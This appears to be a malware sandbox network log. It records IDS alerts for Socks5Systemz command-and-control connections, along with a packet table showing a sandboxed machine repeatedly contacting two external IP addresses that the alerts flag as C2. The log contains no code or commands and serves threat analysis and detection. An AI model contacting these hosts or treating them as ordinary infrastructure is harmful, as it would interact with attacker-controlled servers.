2024-12-14T03:03:01.776783+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49805 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:01.776783+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49805 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:03.473267+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49808 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:03.473267+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49808 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:04.078091+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49808 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:04.078091+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49808 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:05.665156+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49814 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:05.665156+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49814 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:06.269431+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49814 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:06.269431+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49814 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:06.873516+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49814 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:06.873516+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49814 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:08.485516+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49823 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:08.485516+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49823 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:10.101196+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49825 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:10.101196+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49825 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:10.708376+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49825 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:10.708376+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49825 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:11.317374+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49825 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:11.317374+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49825 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:11.921947+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49825 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:11.921947+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49825 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:13.508042+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49835 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:13.508042+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49835 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:14.105556+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49835 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:14.105556+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49835 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:15.692050+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49841 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:15.692050+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49841 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:16.306760+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49841 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:16.306760+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49841 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:17.892807+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49847 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:17.892807+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49847 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:19.468085+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49852 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:19.468085+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49852 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:21.044771+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49856 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:21.044771+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49856 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:22.655205+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49861 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:22.655205+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49861 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:24.257003+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49866 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:24.257003+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49866 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:24.859341+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49866 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:24.859341+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49866 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:26.438505+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49872 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:26.438505+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49872 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:28.022435+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49876 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:28.022435+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49876 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:29.809117+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49882 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:29.809117+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49882 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:31.399703+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49886 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:31.399703+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49886 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:32.982324+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49890 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:32.982324+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49890 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:34.569218+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49895 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:34.569218+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49895 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:35.171676+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49895 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:35.171676+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49895 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:36.746836+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49901 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:36.746836+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49901 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:38.392496+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49905 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:38.392496+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49905 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:39.995708+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49911 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:39.995708+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49911 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:41.677607+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49915 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:41.677607+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49915 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:42.283100+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49915 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:42.283100+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49915 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:43.859511+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49921 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:43.859511+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49921 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:45.435952+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49926 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:45.435952+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49926 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:47.021807+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49930 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:47.021807+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49930 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:47.629535+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49930 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:47.629535+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49930 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:49.207978+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49936 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:49.207978+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49936 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:49.821174+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49936 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:49.821174+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49936 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:50.426317+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49936 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:50.426317+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49936 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:52.004211+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49944 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:52.004211+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49944 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:52.613533+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49944 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:52.613533+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49944 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:53.219153+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49944 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:53.219153+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49944 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:54.800880+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49951 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:54.800880+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49951 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:55.413208+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49951 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:55.413208+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49951 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:57.005945+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49957 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:57.005945+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49957 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:58.578328+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49962 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:58.578328+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49962 | 94.232.249.187 | 80 | TCP
2024-12-14T03:04:00.163081+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49966 | 94.232.249.187 | 80 | TCP
2024-12-14T03:04:00.163081+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49966 | 94.232.249.187 | 80 | TCP
2024-12-14T03:04:01.756260+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49972 | 94.232.249.187 | 80 | TCP
2024-12-14T03:04:01.756260+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49972 | 94.232.249.187 | 80 | TCP
2024-12-14T03:04:03.336492+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49976 | 94.232.249.187 | 80 | TCP
2024-12-14T03:04:03.336492+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49976 | 94.232.249.187 | 80 | TCP
2024-12-14T03:04:05.046644+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49982 | 94.232.249.187 | 80 | TCP
2024-12-14T03:04:05.046644+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49982 | 94.232.249.187 | 80 | TCP
2024-12-14T03:04:06.631012+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49986 | 94.232.249.187 | 80 | TCP
2024-12-14T03:04:06.631012+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49986 | 94.232.249.187 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 14, 2024 03:02:54.137293100 CET | 49788 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:02:54.257214069 CET | 80 | 49788 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:02:54.257498026 CET | 49788 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:02:54.257744074 CET | 49788 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:02:54.377528906 CET | 80 | 49788 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:02:55.599689007 CET | 80 | 49788 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:02:55.599843025 CET | 49788 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:02:55.707192898 CET | 49788 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:02:55.827033043 CET | 80 | 49788 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:02:56.223267078 CET | 80 | 49788 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:02:56.223519087 CET | 49788 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:02:56.223984957 CET | 49795 | 2023 | 192.168.2.5 | 46.8.225.74
Dec 14, 2024 03:02:56.345206976 CET | 2023 | 49795 | 46.8.225.74 | 192.168.2.5
Dec 14, 2024 03:02:56.345380068 CET | 49795 | 2023 | 192.168.2.5 | 46.8.225.74
Dec 14, 2024 03:02:56.345381021 CET | 49795 | 2023 | 192.168.2.5 | 46.8.225.74
Dec 14, 2024 03:02:56.465616941 CET | 2023 | 49795 | 46.8.225.74 | 192.168.2.5
Dec 14, 2024 03:02:56.465809107 CET | 49795 | 2023 | 192.168.2.5 | 46.8.225.74
Dec 14, 2024 03:02:56.585848093 CET | 2023 | 49795 | 46.8.225.74 | 192.168.2.5
Dec 14, 2024 03:02:57.614576101 CET | 2023 | 49795 | 46.8.225.74 | 192.168.2.5
Dec 14, 2024 03:02:57.659636974 CET | 49795 | 2023 | 192.168.2.5 | 46.8.225.74
Dec 14, 2024 03:02:59.629101992 CET | 49788 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:02:59.749269962 CET | 80 | 49788 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:00.188304901 CET | 80 | 49788 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:00.188391924 CET | 49788 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:00.300749063 CET | 49788 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:00.301002026 CET | 49805 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:00.420833111 CET | 80 | 49805 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:00.420914888 CET | 80 | 49788 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:00.421118975 CET | 49788 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:00.421120882 CET | 49805 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:00.421243906 CET | 49805 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:00.541035891 CET | 80 | 49805 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:01.776679039 CET | 80 | 49805 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:01.776782990 CET | 49805 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:01.777196884 CET | 49807 | 2023 | 192.168.2.5 | 46.8.225.74
Dec 14, 2024 03:03:01.896872997 CET | 2023 | 49807 | 46.8.225.74 | 192.168.2.5
Dec 14, 2024 03:03:01.896970034 CET | 49807 | 2023 | 192.168.2.5 | 46.8.225.74
Dec 14, 2024 03:03:01.897048950 CET | 49807 | 2023 | 192.168.2.5 | 46.8.225.74
Dec 14, 2024 03:03:01.897099972 CET | 49807 | 2023 | 192.168.2.5 | 46.8.225.74
Dec 14, 2024 03:03:02.004003048 CET | 49805 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:02.004450083 CET | 49808 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:02.016781092 CET | 2023 | 49807 | 46.8.225.74 | 192.168.2.5
Dec 14, 2024 03:03:02.060585022 CET | 2023 | 49807 | 46.8.225.74 | 192.168.2.5
Dec 14, 2024 03:03:02.124063015 CET | 80 | 49805 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:02.124146938 CET | 80 | 49808 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:02.124238968 CET | 49805 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:02.124355078 CET | 49808 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:02.124443054 CET | 49808 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:02.244075060 CET | 80 | 49808 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:02.870359898 CET | 2023 | 49807 | 46.8.225.74 | 192.168.2.5
Dec 14, 2024 03:03:02.870435953 CET | 49807 | 2023 | 192.168.2.5 | 46.8.225.74
Dec 14, 2024 03:03:03.473124981 CET | 80 | 49808 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:03.473267078 CET | 49808 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:03.582014084 CET | 49808 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:03.702011108 CET | 80 | 49808 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:04.077919960 CET | 80 | 49808 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:04.078090906 CET | 49808 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:04.191267967 CET | 49808 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:04.191570997 CET | 49814 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:04.311425924 CET | 80 | 49814 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:04.311552048 CET | 80 | 49808 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:04.311624050 CET | 49808 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:04.311631918 CET | 49814 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:04.311904907 CET | 49814 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:04.431674004 CET | 80 | 49814 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:05.664997101 CET | 80 | 49814 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:05.665155888 CET | 49814 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:05.769467115 CET | 49814 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:05.889183998 CET | 80 | 49814 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:06.269340038 CET | 80 | 49814 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:06.269431114 CET | 49814 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:06.378938913 CET | 49814 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:06.498791933 CET | 80 | 49814 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:06.873361111 CET | 80 | 49814 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:06.873516083 CET | 49814 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:06.988320112 CET | 49814 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:06.988666058 CET | 49823 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:07.108561039 CET | 80 | 49814 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:07.108577967 CET | 80 | 49823 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:07.108649015 CET | 49814 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:07.108683109 CET | 49823 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:07.108853102 CET | 49823 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:07.228475094 CET | 80 | 49823 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:08.485445976 CET | 80 | 49823 | 94.232.249.187 | 192.168.2.5
Dec 14, 2024 03:03:08.485516071 CET | 49823 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:08.598045111 CET | 49823 | 80 | 192.168.2.5 | 94.232.249.187
Dec 14, 2024 03:03:08.598711014 CET | 49825 | 80 | 192.168.2.5 | 94.232.249.187
